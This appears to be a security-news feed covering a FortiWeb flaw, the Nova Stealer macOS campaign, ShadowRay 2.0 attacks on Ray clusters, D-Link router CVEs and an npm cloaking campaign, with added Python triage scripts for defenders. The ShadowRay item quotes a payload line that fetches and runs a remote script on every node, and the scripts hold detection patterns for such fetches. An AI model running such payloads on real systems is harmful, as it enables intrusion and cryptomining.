• The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert regarding a critical OS command injection vulnerability in Fortinet FortiWeb, warning that the flaw is actively being exploited in real-world attacks. The vulnerability, tracked as CVE-2025-58034, allows authenticated attackers to execute unauthorized code on affected systems through specially crafted HTTP requests or command-line interface […]

    The post CISA Alerts on Fortinet FortiWeb Vulnerability Exploited in Real-World Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A new malware campaign targeting macOS users has emerged with a dangerous focus on cryptocurrency wallet theft.

    The malware, called Nova Stealer, uses a clever approach to trick victims by replacing genuine cryptocurrency applications with fake versions that steal wallet recovery phrases.

    This bash-based stealer has been identified attacking users of popular cryptocurrency wallets, including Ledger Live, Trezor Suite, and Exodus.

    The attack starts when an unknown dropper downloads and runs a script called mdriversinstall.sh from the command-and-control server at hxxps://ovalresponsibility[.]com/mdriversinstall[.]sh.

    This initial script creates a hidden directory at ~/.mdrivers and installs several components, including a script manager and launcher.

    The malware generates a unique user ID using the uuidgen command and stores it in ~/.mdrivers/user_id.txt to track infected systems.

    BruceKetta.space security researchers identified the Nova Stealer campaign and noted its modular design. The malware uses an orchestrator script called mdriversmngr.sh that downloads additional modules from the command-and-control server.

    These modules come encoded in base64 format and are stored under ~/.mdrivers/scripts. The malware achieves persistence by creating a LaunchAgent plist file labeled application.com.artificialintelligence that ensures the scripts run automatically at every system startup.

    One particularly interesting technique used by Nova Stealer is running scripts inside detached screen sessions using the command screen -dmS <name> <path>.

    This approach keeps the malicious processes running independently in the background, hidden from the user’s view. The processes even survive when users log out because they run as daemon sessions with the -dmS flag.

    Application Swapping and Seed Phrase Theft

    Nova Stealer’s most dangerous capability involves swapping legitimate cryptocurrency wallet applications with fake versions.

    The malware component mdriversswaps.sh detects if Ledger Live or Trezor Suite are installed on the system by checking paths in /Applications/.

    When found, the script removes the original applications using rm -rf and deletes their Launchpad database entries through SQLite commands like DELETE FROM apps/items where title or ids match.

    Nova (Source - BruceKetta.space)

    The malware then downloads malicious replacement applications from specific domains, including hxxps://wheelchairmoments[.]com for fake Ledger Live and hxxps://sunrisefootball[.]com for fake Trezor Suite.

    These ZIP archives are saved to ~/Library/LaunchAgents/ and extracted to replace the original applications. The malware modifies the Dock configuration using /usr/libexec/PlistBuddy to delete the old app entry and add a new one pointing to the fake application.

    The fake wallet applications use Swift and WebKit to render phishing pages that look legitimate. When victims open what they believe is their wallet application, they see a recovery interface asking them to enter their seed phrases.

    The malicious JavaScript code includes validation against BIP-39 and SLIP-39 word lists to provide auto-complete functionality, making the fake interface feel authentic.

    Fake app execution (Source - BruceKetta.space)

    As users type their recovery words, the data is sent to endpoints /seed and /seed2 with a 200-400ms delay after each keystroke, allowing attackers to capture partial phrases in real-time without waiting for final submission.

    Nova Stealer also runs dedicated exfiltration modules. The mdriversfiles.sh component searches for and steals wallet files, including Trezor IndexedDB logs, Exodus files like passphrase.json and seed.seco, and Ledger’s app.json.

    These files are uploaded to the command-and-control server every 20 hours using binary POST requests. Additionally, mdriversmetrics.sh collects system information, including installed applications, running processes, and Dock items, to help attackers profile victims and improve their campaigns.
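    A defender-side triage script for the indicators above, added here as an example (not BruceKetta.space's tooling, and not the malware's code): it checks a home directory for the ~/.mdrivers staging layout and the application.com.artificialintelligence LaunchAgent, and flags processes running out of that directory, such as the detached screen sessions. The sample home and ps listing it builds are constructed.

```python
"""Host triage for the Nova Stealer indicators above. Added example, not BruceKetta.space's
tooling; paths, script names and the LaunchAgent label come from the write-up."""
import os
import plistlib
import tempfile

NOVA_LABEL = "application.com.artificialintelligence"
NOVA_DIR = ".mdrivers"
NOVA_SCRIPTS = ("mdriversinstall.sh", "mdriversmngr.sh", "mdriversswaps.sh",
                "mdriversfiles.sh", "mdriversmetrics.sh")


def check_home(home):
    """Return a list of findings for one user's home directory."""
    findings = []
    staging = os.path.join(home, NOVA_DIR)
    if os.path.isdir(staging):
        findings.append("staging dir present: " + staging)
        if os.path.isfile(os.path.join(staging, "user_id.txt")):
            findings.append("victim tracking id present: " + os.path.join(staging, "user_id.txt"))
        if os.path.isdir(os.path.join(staging, "scripts")):
            findings.append("decoded module dir present: " + os.path.join(staging, "scripts"))
    agents = os.path.join(home, "Library", "LaunchAgents")
    for name in sorted(os.listdir(agents)) if os.path.isdir(agents) else []:
        path = os.path.join(agents, name)
        if name.lower().endswith(".zip"):
            # The fake wallet apps are dropped as ZIPs into LaunchAgents before extraction.
            findings.append("archive staged in LaunchAgents: " + path)
        elif name.endswith(".plist"):
            try:
                with open(path, "rb") as fh:
                    plist = plistlib.load(fh)
            except Exception:
                continue  # unreadable or malformed plist: out of scope for this check
            label = str(plist.get("Label", ""))
            args = " ".join(str(a) for a in plist.get("ProgramArguments", []))
            if label == NOVA_LABEL or NOVA_DIR in args or any(s in args for s in NOVA_SCRIPTS):
                findings.append("LaunchAgent persistence: %s (Label=%s)" % (path, label))
    return findings


def suspicious_processes(ps_lines):
    """Given lines of `ps -axo pid=,command=`, return (pid, command) pairs for anything
    running out of the staging dir, including the detached SCREEN sessions."""
    hits = []
    for line in ps_lines:
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or not parts[0].isdigit():
            continue
        pid, cmd = int(parts[0]), parts[1]
        if "/" + NOVA_DIR + "/" in cmd or any(s in cmd for s in NOVA_SCRIPTS):
            hits.append((pid, cmd))
    return hits


# Constructed ps listing; a `screen -dmS` session shows up as an uppercase SCREEN process.
SAMPLE_PS = [
    "  412 /usr/sbin/distnoted agent",
    "  931 SCREEN -dmS mgr /Users/alice/.mdrivers/mdriversmngr.sh",
    "  944 /bin/bash /Users/alice/.mdrivers/scripts/mdriversfiles.sh",
]


def build_sample_home(root):
    """Constructed layout of an infected home directory, for demonstration only."""
    home = os.path.join(root, "alice")
    os.makedirs(os.path.join(home, NOVA_DIR, "scripts"))
    with open(os.path.join(home, NOVA_DIR, "user_id.txt"), "w") as fh:
        fh.write("constructed-uuid\n")
    agents = os.path.join(home, "Library", "LaunchAgents")
    os.makedirs(agents)
    with open(os.path.join(agents, "Ledger Live.zip"), "wb") as fh:
        fh.write(b"PK\x03\x04")
    with open(os.path.join(agents, NOVA_LABEL + ".plist"), "wb") as fh:
        plistlib.dump({"Label": NOVA_LABEL, "RunAtLoad": True, "ProgramArguments":
                       ["/bin/bash", os.path.join(home, NOVA_DIR, "mdriversmngr.sh")]}, fh)
    return home


def demo():
    """Run both checks on the constructed sample; returns (findings, process hits)."""
    with tempfile.TemporaryDirectory() as root:
        findings = check_home(build_sample_home(root))
    return findings, suspicious_processes(SAMPLE_PS)
```

    On a live Mac, call check_home(os.path.expanduser("~")) for each user and feed the output of `ps -axo pid=,command=` to suspicious_processes.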

    The post New Nova Stealer Attacking macOS Users by Swapping Legitimate Apps to Steal Cryptocurrency Wallet Data appeared first on Cyber Security News.

  • A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them into a massive network. The router hijacking activity has been codenamed Operation WrtHug by SecurityScorecard’s STRIKE team. Southeast Asia and European countries are some of the other regions where infections have

  • ESET researchers have uncovered a sophisticated attack chain orchestrated by the China-aligned threat actor PlushDaemon, revealing how the group leverages a previously undocumented network implant, EdgeStepper, to conduct adversary-in-the-middle attacks. By compromising network devices and redirecting DNS queries to malicious servers, PlushDaemon intercepts legitimate software updates and replaces them with trojanized versions containing the SlowStepper […]

    The post Chinese PlushDaemon Hackers Exploit EdgeStepper Tool to Hijack Legitimate Updates and Redirect to Malicious Servers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybersecurity researchers have uncovered an active global hacking campaign leveraging a known flaw in Ray, an open-source AI framework widely used for managing distributed computing tasks.

    Dubbed ShadowRay 2.0, this attack exploits vulnerability CVE-2023-48022 to silently seize control of powerful AI computing clusters and turn them into cryptocurrency mining operations.

    The campaign represents a significant escalation from the initial ShadowRay discovery in March 2024, with attackers employing sophisticated tactics to remain hidden while extracting maximum value from compromised infrastructure.

    Oligo Security researchers identified the attack campaign in early November 2025, discovering that threat actors using the name IronErn440 have weaponized Ray’s legitimate orchestration features into tools for self-propagating attacks.

    What makes this threat particularly alarming is the sheer scale of exposure. The number of exposed Ray servers worldwide has grown from thousands during the original discovery to more than 230,000 instances today.

    Many belong to active startups, research laboratories, and cloud-hosting providers, creating an expansive attack surface.

    Oligo Security analysts identified the attack after observing region-aware malware being distributed through GitLab.

    The attackers initially leveraged the DevOps platform to deliver customized payloads adapted to each victim’s geographic location.

    After GitLab took down the malicious repository on November 5, 2025, the threat actors quickly migrated their operation to GitHub, demonstrating remarkable operational agility.

    By November 10, they had established a new repository and continued their campaign with even greater sophistication.

    AI Attacking AI Infrastructure

    The attack unfolds through multiple coordinated stages, beginning with reconnaissance using interact.sh, an out-of-band platform that lets attackers identify vulnerable servers without traditional noisy scanning.

    Attackers send probes targeting Ray’s unprotected Jobs API, triggering callbacks from vulnerable instances. Once targets are identified, they exploit the unauthenticated Ray dashboard to submit malicious jobs that execute arbitrary code with cluster privileges.

    Ray Cluster (Source - Oligo)

    The most notable aspect is the use of AI-generated payloads. The attackers deploy Python code that automatically discovers available cluster resources, calculates 60 percent CPU and GPU allocation to avoid immediate detection, and then injects cryptocurrency miners disguised as legitimate system processes.

    The payloads demonstrate sophisticated error handling and self-adaptation, suggesting they were generated or refined using AI tools to accelerate payload development.

    A critical code snippet shows the multi-stage infection mechanism. The initial access payload uses Ray’s NodeAffinitySchedulingStrategy to enumerate cluster nodes and deploy infection scripts to each one:

    nodes=[n for n in ray.nodes() if n.get('Alive', False)]
    cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
    [ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...

    The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.

    They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] and dns-filter services, effectively hiding in plain sight.
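    An added Linux triage example (not Oligo's code) for the persistence and masquerading just described: it flags processes that carry a kernel-worker name like [kworker/0:0] but have a non-empty cmdline or a parent other than kthreadd, which genuine kernel threads never do, and flags crontab entries that run every fifteen minutes and pull a script from a raw GitLab or GitHub URL. The /proc tree, crontab and repository path below are constructed placeholders.

```python
"""Linux triage for the ShadowRay 2.0 persistence described above. Added example, not
Oligo's code: the [kworker/0:0] disguise and the 15-minute cron fetch come from the
article; the /proc tree, crontab and repository URL below are constructed."""
import os
import re
import tempfile

# A real kernel thread is a child of kthreadd (PID 2) and has an empty cmdline; a
# user process that merely renamed itself to look like one has neither property.
KTHREAD_LIKE = re.compile(r"^\[?(kworker|ksoftirqd|kthreadd|migration|rcu_)[^\]]*\]?$")
# A script pulled from a raw GitLab (/-/raw/) or GitHub (raw.githubusercontent.com) URL.
CRON_FETCH = re.compile(r"(wget|curl)[^|;&]*(https?://\S+/-/raw/|raw\.githubusercontent\.com)")


def masquerading_processes(proc_root="/proc"):
    """Return [(pid, name, cmdline)] for user processes dressed up as kernel threads."""
    hits = []
    for entry in sorted((e for e in os.listdir(proc_root) if e.isdigit()), key=int):
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "status")) as fh:
                fields = dict(line.split(":", 1) for line in fh if ":" in line)
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue  # process exited between listdir and open, or is unreadable
        name, ppid = fields.get("Name", "").strip(), fields.get("PPid", "").strip()
        looks_kernel = KTHREAD_LIKE.match(name) or KTHREAD_LIKE.match(cmdline)
        if looks_kernel and (cmdline or ppid not in ("0", "2")):
            hits.append((int(entry), name, cmdline))
    return hits


def suspicious_cron_lines(crontab_text):
    """Flag user-crontab entries that run every 15 minutes and fetch a raw repo script."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        if fields[0] in ("*/15", "0,15,30,45") and CRON_FETCH.search(fields[5]):
            hits.append(line)
    return hits


# Constructed crontab; EXAMPLE-group/EXAMPLE-project is a placeholder, not the real repository.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * wget -qO- https://gitlab.com/EXAMPLE-group/EXAMPLE-project/-/raw/main/stage.sh | sh
"""


def build_sample_proc(root):
    """Constructed /proc: a real kworker, init, and a miner renamed to look like a kworker."""
    samples = {"37": ("kworker/1:2", "2", b""),
               "1": ("systemd", "0", b"/sbin/init\0"),
               "4242": ("kworker/0:0", "1", b"[kworker/0:0]\0")}
    for pid, (name, ppid, cmdline) in samples.items():
        os.makedirs(os.path.join(root, pid))
        with open(os.path.join(root, pid, "status"), "w") as fh:
            fh.write("Name:\t%s\nState:\tS (sleeping)\nPPid:\t%s\n" % (name, ppid))
        with open(os.path.join(root, pid, "cmdline"), "wb") as fh:
            fh.write(cmdline)


def demo():
    """Run both checks on the constructed samples; returns (process hits, cron hits)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_proc(root)
        procs = masquerading_processes(root)
    return procs, suspicious_cron_lines(SAMPLE_CRONTAB)
```

    On a real host, run masquerading_processes() with the default /proc root and pass the output of `crontab -l` for each user to suspicious_cron_lines.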

    Mining Pool Statistics (Source – Oligo)

    What sets this campaign apart is the active competition dynamics. Attackers deploy scripts to detect and terminate rival cryptocurrency miners, then block competing mining pools through iptables rules and host file modifications.

    They even target pools on specific ports used by competing threat actors, revealing an underground ecosystem where multiple criminal groups fight for the same compromised resources.

    The infrastructure adaptation is equally concerning. For victims in China, attackers deliver region-specific payloads through proxy services to bypass network restrictions.

    They employ geographic detection via ip-api.com, executing different scripts for Chinese versus international targets.

    The attackers continuously update their payloads through GitLab commits, treating infrastructure as code and enabling real-time evolution of their techniques without redeploying to victim machines.

    The post New ShadowRay Attack Exploit Ray AI-Framework Vulnerability to Attack AI Systems appeared first on Cyber Security News.

  • The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical vulnerability affecting Fortinet FortiWeb appliances that threat actors are currently exploiting in active attacks.

    The agency added CVE-2025-58034 to its Known Exploited Vulnerabilities (KEV) catalog on November 18, 2025, signaling immediate risk to organizations using the affected product.

    The vulnerability identified as CVE-2025-58034 is an OS command injection weakness categorized under CWE-78.

    This security flaw allows authenticated attackers to execute unauthorized code on the underlying operating system of FortiWeb devices.

    Critical OS Command Injection Flaw

    Exploitation occurs through specially crafted HTTP requests or command-line interface (CLI) commands that bypass security controls and grant attackers direct access to system-level functions.

    Despite requiring authentication, this vulnerability poses a significant threat because attackers who gain initial access can leverage it to escalate privileges and execute malicious code.

    This can lead to complete system compromise, data theft, and potential deployment of ransomware or other malware.

    CVE ID:                CVE-2025-58034
    Vulnerability:         OS Command Injection
    Affected Product:      Fortinet FortiWeb
    Impact:                Unauthorized code execution
    Exploit Prerequisites: Authentication required
    Related CWE:           CWE-78

    CISA has mandated that federal agencies must apply security patches and mitigations by November 25, 2025, giving organizations just seven days to remediate the vulnerability.

    The directive follows Binding Operational Directive (BOD) 22-01, which requires agencies to address known exploited vulnerabilities within strict timeframes.

    Organizations using Fortinet FortiWeb are strongly urged to follow vendor instructions immediately. Fortinet has released security updates and mitigation guidance that administrators should implement without delay.

    CISA recommends following applicable cloud service guidance or discontinuing use of vulnerable products until proper security measures can be implemented.

    The active exploitation of this vulnerability underscores the importance of keeping security patches up to date and monitoring vendor advisories for enterprise security infrastructure.

    The post CISA Warns of Fortinet FortiWeb OS Command Injection Vulnerability Exploited in the Wild appeared first on Cyber Security News.

  • In October 2025, Morphisec’s anti-ransomware prevention platform detected and neutralized a sophisticated cyberattack targeting a major U.S. real estate company. The campaign showcased the emerging threat posed by the Tuoni C2 framework, a free, modular command-and-control tool designed to deliver stealthy, in-memory payloads while evading traditional security defenses. What made this attack particularly notable was the […]

    The post Hackers Exploit Tuoni C2 Framework to Stealthily Deploy In-Memory Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Microsoft is introducing a new capability in Teams that allows users to report messages they believe were mistakenly flagged as security threats.

    The feature is a significant step toward improving detection accuracy and reducing false positives across organizations worldwide. Rollout is expected to complete by the end of November 2025.

    The reporting feature enables users to provide direct feedback on messages containing URLs incorrectly identified as malicious.

    This user-driven approach creates a valuable feedback mechanism that helps Microsoft refine its threat detection models over time.

    Organizations using Microsoft Defender for Office 365 Plan 2 or Microsoft Defender XDR can leverage this capability to strengthen their security operations.

    When users report incorrect detections, the submissions are stored in the Submissions tab of the Microsoft Defender portal, creating a centralized repository where security teams can review and analyze false-positive patterns.

    This data helps Microsoft improve AI and machine learning models that classify threats, making detection systems gradually more accurate.

    The feature will be available across all Microsoft Teams platforms, including Android, Desktop (Windows), iOS, Mac, and Web.

    This comprehensive rollout ensures users can report threats regardless of their device preference, improving access and participation in the feedback process.

    Teams admin center

    Microsoft Teams Report Messages Feature

    Organizations must complete two critical configuration steps for the feature to function correctly.

    First, admins should navigate to the Teams admin center and enable “Report incorrect security detections” under Messaging settings > Messaging safety.

    Second, the corresponding setting must be enabled in the Microsoft Defender portal; both settings must be active for the feature to work.

    Ensure the corresponding setting is enabled

    For new users, the Microsoft Defender setting is on by default. Existing users have to turn it on themselves to start getting user reports. This feature also adds new data storage at Microsoft.

    User submissions regarding incorrectly flagged messages are retained in the Defender portal, and admins can control feature access through Entra ID group membership.

    This ensures organizations maintain governance over who can report threats while continuously applying user feedback to improve detection accuracy.

    The post Microsoft Teams New Feature Let Users Report Messages Incorrectly Flagged as Security Threats appeared first on Cyber Security News.

  • Multiple critical vulnerabilities affect D-Link DIR-878 routers across all models and firmware revisions. These devices reached end of life on January 31, 2021, and no longer receive security updates or technical support from D-Link Corporation.

    The vulnerabilities allow remote attackers to gain complete control of affected routers without requiring authentication.

    Two of the most severe vulnerabilities (CVE-2025-60672 and CVE-2025-60673) are command injection flaws in the router’s CGI web interface.

    Attackers can craft specially designed HTTP requests targeting the SetDynamicDNSSettings and SetDMZSettings functionality to execute arbitrary commands on the device.

    D-Link discovered the first flaw, which stems from improper handling of the ServerAddress and Hostname parameters; both are stored in NVRAM without sanitization.

    The second vulnerability affects the IPAddress parameter in DMZ settings, which is similarly used without validation by the librcm.so library.

    Both issues carry critical CVSS scores of 9.8, meaning remote attackers can execute code without authentication or user interaction.

    CVE ID          Vulnerability Type     CVSS Score      Attack Vector                  Impact
    CVE-2025-60672  Command Injection      9.8 (Critical)  Network / no auth required     Remote Code Execution
    CVE-2025-60673  Command Injection      9.8 (Critical)  Network / no auth required     Remote Code Execution
    CVE-2025-60674  Stack Buffer Overflow  8.5 (High)      Physical access / USB          Arbitrary Code Execution
    CVE-2025-60676  Command Injection      8.5 (High)      Local / write access to /tmp   Arbitrary Command Execution

    CVE-2025-60674 describes a stack buffer overflow in the rc binary’s USB storage-handling module, triggered when USB device serial numbers are improperly read.

    This vulnerability requires physical access to, or control over, a USB device, but it allows arbitrary code execution on the router. CVE-2025-60676 affects the timelycheck and sysconf binaries: an attacker with write access to the /tmp/new_qos rule file can run arbitrary commands, because the binaries concatenate the file’s contents into command strings without validation.

    D-Link strongly recommends that users upgrade to current-generation products or immediately perform comprehensive data backups.

    Organizations deploying DIR-878 routers should isolate these devices from untrusted networks and implement restrictive firewall rules.

    D-Link’s advisory emphasizes that end-of-life products may harm other connected devices, and continued use poses significant security risks.

    Users unable to upgrade should ensure devices run the latest available firmware and maintain strong, unique administrative passwords with Wi-Fi encryption enabled.

    The post Multiple Vulnerabilities in D-Link EoL/EoS Routers Allows Remote Code Execution Attacks appeared first on Cyber Security News.

  • A sophisticated malware campaign targeting the npm ecosystem has emerged, deploying a clever detection system that distinguishes between regular users and security researchers.

    The threat actor, operating under the alias dino_reborn, created seven malicious npm packages designed to redirect users to crypto-themed scam sites while evading security detection.

    This intricate operation represents a new frontier in supply chain attacks, combining traffic cloaking technology with browser-based evasion techniques to deliver precision-targeted malicious content.

    The campaign leverages a set of contaminated packages including signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830.

    Six of these packages contain 39 kilobytes of malware code, while the seventh constructs a malicious webpage. When users visit the website deployed by these packages, the malware automatically analyzes their behavior and system characteristics to determine their threat level.

    The threat actor then serves dramatically different experiences based on this classification—victims encounter a convincing fake CAPTCHA leading to malicious destinations, while researchers see only blank pages hiding the true nature of the attack.

    Malicious packages on npm (Source - Socket.dev)

    Socket.dev security analysts identified and documented this complex campaign after discovering the interconnected infrastructure linking all packages to a single threat actor.

    The research team traced the creation email to geneboo@proton[.]me and uncovered how the attacker was using Adspect, a legitimate cloaking service designed to distinguish between bots and real visitors.

    By weaponizing this technology within npm packages, the attacker found a way to distribute self-contained malicious code that automatically gates access to harmful payloads based on sophisticated fingerprinting.

    The campaign’s success stems from its multi-layered approach to evading both automated security scanners and human analysis. Upon deployment, the malware wraps its code in an Immediately Invoked Function Expression (IIFE), ensuring it executes automatically without requiring explicit function calls.

    The code aggressively blocks researcher access by disabling browser developer tools, preventing right-click context menus, blocking keyboard shortcuts like F12, Ctrl+U, and Ctrl+Shift+I, and continuously reloading the page if DevTools are detected.

    Technical Analysis of the Detection Evasion Mechanism

    The malware’s ability to distinguish victims from researchers relies on a sophisticated fingerprinting system that collects thirteen distinct data points about each visitor.

    When a user accesses the compromised website, the JavaScript payload gathers information, including the browser user agent, host information, referrer URL, request method, server hostname, protocol encryption status, request timestamp, language preferences, and accepted encoding formats.

    This comprehensive data collection creates a detailed profile that gets transmitted to the Adspect API through a proxy endpoint, such as association-google.xyz/adspect-proxy.php, effectively reconstructing server-side request capabilities within the browser environment.

    The decision-making logic represents the campaign’s core innovation. When Adspect receives the fingerprint data, it analyzes the traffic characteristics and returns a response indicating whether the visitor appears legitimate or suspicious.

    If the API determines the traffic originates from a researcher, it returns an “ok: false” status, triggering the display of a blank white page containing only generic text about Offlido, a fake offline storage company.

    This benign page provides perfect cover, appearing completely legitimate to any analyst who might inspect it. Conversely, if Adspect determines the visitor is a potential victim, it returns “ok: true” along with a malicious redirect URL and triggers display of a fake CAPTCHA interface.

    The CAPTCHA mimics real verification systems from legitimate crypto exchanges like Uniswap and Jupiter, borrowing their branding to build false credibility.

    When victims click the verification checkbox, a three-second loading animation plays before showing success, followed by automatic redirection to the malicious URL in a new browser tab.

    This psychological manipulation, combined with the familiar CAPTCHA interface, increases the likelihood that victims will trust and engage with the redirect without suspicion.

    The attacker’s infrastructure flexibility represents another significant advantage. Because Adspect returns new redirect URLs on each request, the threat actor can rotate final destinations server-side without ever republishing any npm package, making traditional takedown efforts reactive rather than preventative.

    This allows the campaign to remain operational even after initial detection and package removal from npm’s registry.
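    An added static-triage example (not Socket.dev's scanner, and not the packages' own code) for the cloaking and anti-analysis markers described above: it scores JavaScript for the IIFE wrapper, context-menu and F12/Ctrl+U/Ctrl+Shift+I blocking, a DevTools reload loop, the Adspect proxy call, and a CAPTCHA-to-window.open redirect, so that an unpacked package or node_modules tree can be swept for the pattern. The two sample scripts and the proxy host name are constructed.

```python
"""Static triage of JavaScript for the cloaking markers described above. Added example,
not Socket.dev's scanner; the indicator list comes from the article, the samples are
constructed and PROXY-HOST.invalid is a placeholder."""
import os
import re

# (weight, pattern). Benign bundles use IIFEs too, so that one counts for little;
# the Adspect proxy call is the most specific marker and weighs the most.
INDICATORS = {
    "iife_wrapper": (1, re.compile(r"\(\s*function\s*\(\s*\)\s*\{")),
    "blocks_contextmenu": (2, re.compile(
        r"addEventListener\(\s*['\"]contextmenu['\"][\s\S]{0,200}?preventDefault")),
    "blocks_devtools_keys": (2, re.compile(
        r"keyCode\s*===?\s*123|['\"]F12['\"]|ctrlKey[\s\S]{0,80}?['\"][IiUu]['\"]")),
    "devtools_reload_loop": (3, re.compile(
        r"devtools[\s\S]{0,300}?location\.reload|location\.reload[\s\S]{0,300}?devtools", re.I)),
    "adspect_proxy": (4, re.compile(r"adspect[-_]?proxy\.php|[\"'/]adspect", re.I)),
    "fake_captcha_redirect": (3, re.compile(r"captcha[\s\S]{0,500}?window\.open\s*\(", re.I)),
}
THRESHOLD = 6  # total weight at which a file is reported


def scan_text(js):
    """Return (score, [indicator names]) for one script's source text."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(js)]
    return sum(INDICATORS[n][0] for n in hits), hits


def scan_tree(root):
    """Walk an unpacked package or node_modules tree; return {path: hits} at or above THRESHOLD."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith((".js", ".mjs", ".cjs")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    score, hits = scan_text(fh.read())
            except OSError:
                continue
            if score >= THRESHOLD:
                flagged[path] = hits
    return flagged


# Constructed text resembling the cloaking loader's behaviour; it is scanned, never executed.
SAMPLE_CLOAKER = """
(function () {
  document.addEventListener('contextmenu', function (e) { e.preventDefault(); });
  document.addEventListener('keydown', function (e) {
    if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.key === 'I') ||
        (e.ctrlKey && e.key === 'u')) { e.preventDefault(); }
  });
  setInterval(function () { if (devtoolsOpen()) { location.reload(); } }, 500);
  fetch('https://PROXY-HOST.invalid/adspect-proxy.php', { method: 'POST', body: JSON.stringify(fp) })
    .then(function (r) { return r.json(); })
    .then(function (d) { if (d.ok) { showCaptcha(function () { window.open(d.url, '_blank'); }); } });
})();
"""

# Constructed ordinary front-end code: an IIFE and a CAPTCHA call, but no cloaking.
SAMPLE_BENIGN = """
(function () {
  document.addEventListener('keydown', function (e) { if (e.key === 'Escape') { closeDialog(); } });
  fetch('/api/captcha/verify', { method: 'POST' }).then(function (r) { return r.json(); });
})();
"""
```

    Run scan_tree("node_modules") after installing into a scratch directory; a hit on adspect_proxy alone is worth a manual look even when the total stays below THRESHOLD.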

    The post New npm Malware Campaign Verifies if the Visitor is a Victim or a Researcher Before Triggering Infection appeared first on Cyber Security News.
